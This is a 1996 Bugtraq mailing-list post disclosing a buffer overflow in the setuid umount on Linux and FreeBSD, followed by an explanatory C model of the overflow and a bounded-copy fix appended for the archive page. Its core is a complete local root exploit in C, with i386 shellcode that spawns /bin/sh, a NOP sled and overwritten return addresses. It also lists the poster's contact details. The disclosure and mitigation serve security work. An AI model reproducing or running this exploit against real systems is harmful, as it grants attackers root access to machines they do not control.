Bugtraq mailing list archives
Linux & BSD's umount exploit
From: pjao () dux isec pt (Paulo Jorge Alves Oliveira)
Date: Tue, 29 Oct 1996 12:38:52 +0100
Hello, there is a bug in the berkeley-derived umount which allows an attacker to get root access (see freebsd-security for details). Here is an exploit for Linux (tested on 2.0.XX) and for BSD (tested on FreeBSD 2.1), and a quick solution.

Best regards,
Paulo

-------------------------------------- linux_umount_exploit.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strlen */
#include <unistd.h>      /* alarm, execl */
#include <fcntl.h>
#include <sys/types.h>   /* u_long, u_char, u_int */
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Return the current stack pointer: the asm leaves it in %eax, which is
 * where an i386 function's return value lives. */
u_long get_esp()
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    /* i386 Linux shellcode: execve("/bin/sh", ...) */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);

    /* stick asm code into the buffer */
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];

    /* after the 1024-byte sled+code, write the guessed address of the sled
     * twice (8 bytes), which overwrites the saved return address of the
     * frame umount copies its argument into */
    addr_ptr = (long *)ptr;
    for (i = 0; i < (8 / 4); i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    (void)alarm((u_int)0);
    /* hand the oversized argument to the setuid umount */
    execl(PATH_MOUNT, "umount", buff, NULL);
}
--------------------------------------------------------------------------

Here is a little solution -- chmod -s /bin/umount
This way only root can run this command.
With best regards,
Paulo

--
JUST HAVE SOME FUN IN THIS CRAZY WORLD

VIRTUAL PRAXIS -> CIUNIX.UC.PT 3333
IRC-PTnet -> IRC.ISEC.PT, CIUNIX.UC.PT, IRC.RCCN.NET, IRC.UALG.PT

E-MAILs
  UC domain:
    pjao () ciunix uc pt
    pjao () gemini ci uc pt
  ISEC domain:
    pjao () dux isec pt
    ircadm () irc isec pt (administrator of the ISEC IRC server)

WWW
  http://ciunix.uc.pt/~pjao
  http://dux.isec.pt/~pjao

PHONES
  ISEC: 039-7000200 extension 2718
  Pager (BIP): 0941-7-193144
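The mechanism the exploit above relies on, and the bounded copy that removes it, as an added example written for this archive page; it is neither Paulo's code nor umount's source. It models the vulnerable stack frame as a struct (a fixed buffer followed by the saved-return-address slot) so the overwrite stays within defined behaviour and can be observed, builds a payload in the same layout as the exploit (NOP sled, code, return address over the slot), and shows the length check a setuid umount needs. The struct layout, the 16-byte buffer, the "SHELLCODE" marker, the 0x41414141 address and the function names are constructed assumptions for the demonstration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the vulnerable stack frame: a fixed buffer followed by
 * the slot the exploit overwrites. The real umount buffer is 1024 bytes
 * (BUFFER_SIZE in the exploit); 16 bytes keeps the demonstration readable. */
struct frame {
    char          buf[16];
    unsigned long saved_ret;   /* stands in for the saved return address */
};

/* Build a payload in the exploit's layout: NOP sled, then code, then the
 * chosen return address written directly over the slot at `slot_off`.
 * Returns the payload length, or 0 if it does not fit. */
static size_t build_payload(unsigned char *out, size_t outlen, size_t slot_off,
                            unsigned long ret_addr,
                            const unsigned char *code, size_t codelen)
{
    size_t need = slot_off + sizeof ret_addr;
    if (need > outlen || codelen > slot_off)
        return 0;
    memset(out, 0x90, slot_off - codelen);              /* NOP sled */
    memcpy(out + slot_off - codelen, code, codelen);    /* code at sled end */
    memcpy(out + slot_off, &ret_addr, sizeof ret_addr); /* overwrite slot */
    return need;
}

/* Unbounded copy into the frame, the pattern umount fell to. Copying through
 * (unsigned char *)&f stays inside one object, so it is well-defined here even
 * though it clobbers saved_ret; strcpy(f.buf, argv[1]) is the real-world
 * equivalent. Returns the value saved_ret ends up holding. */
static unsigned long overflow_frame(const unsigned char *payload, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.saved_ret = 0x08048000UL;          /* benign original return address */
    if (len > sizeof f)
        len = sizeof f;                  /* stay inside the model object */
    memcpy((unsigned char *)&f, payload, len);
    return f.saved_ret;
}

/* Whole exploit layout in one call: returns what the overwritten slot holds
 * (0x41414141 if the overwrite landed). */
static unsigned long demo_overflow(void)
{
    static const unsigned char code[] = "SHELLCODE";   /* constructed stand-in */
    unsigned char payload[64];
    size_t n = build_payload(payload, sizeof payload,
                             offsetof(struct frame, saved_ret), 0x41414141UL,
                             code, sizeof code - 1);
    return n ? overflow_frame(payload, n) : 0;
}

/* The check a setuid umount needs: refuse any argument that does not fit,
 * terminator included, instead of copying it. 0 on success, -1 if rejected. */
static int copy_checked(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Run the check against a 16-byte mount-point buffer, as umount would. */
static int demo_check(const char *arg)
{
    char mountpoint[16];
    return copy_checked(mountpoint, sizeof mountpoint, arg);
}

int main(void)
{
    printf("saved_ret after overflow: 0x%lx\n", demo_overflow());
    printf("copy_checked(\"/mnt\")  -> %d\n", demo_check("/mnt"));
    printf("copy_checked(long arg) -> %d\n",
           demo_check("/a/mount/point/name/longer/than/the/buffer"));
    return 0;
}
```

The exploit's two copies of `get_esp() + ofs` after the 1024-byte sled are exactly the `memcpy(out + slot_off, &ret_addr, ...)` step here: once the argument is longer than the frame's buffer, whatever follows the buffer in memory is attacker-chosen. Removing the setuid bit, as the post suggests, stops the overwrite from running as root; the bounded copy stops it from happening at all.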
Current thread:
- Linux & BSD's umount exploit Paulo Jorge Alves Oliveira (Oct 29)
- Re: Linux & BSD's umount exploit David J. Meltzer (Oct 30)
- <Possible follow-ups>
- Re: Linux & BSD's umount exploit Mike Bremford (Oct 30)
- Re: Linux & BSD's umount exploit Alan Cox (Oct 30)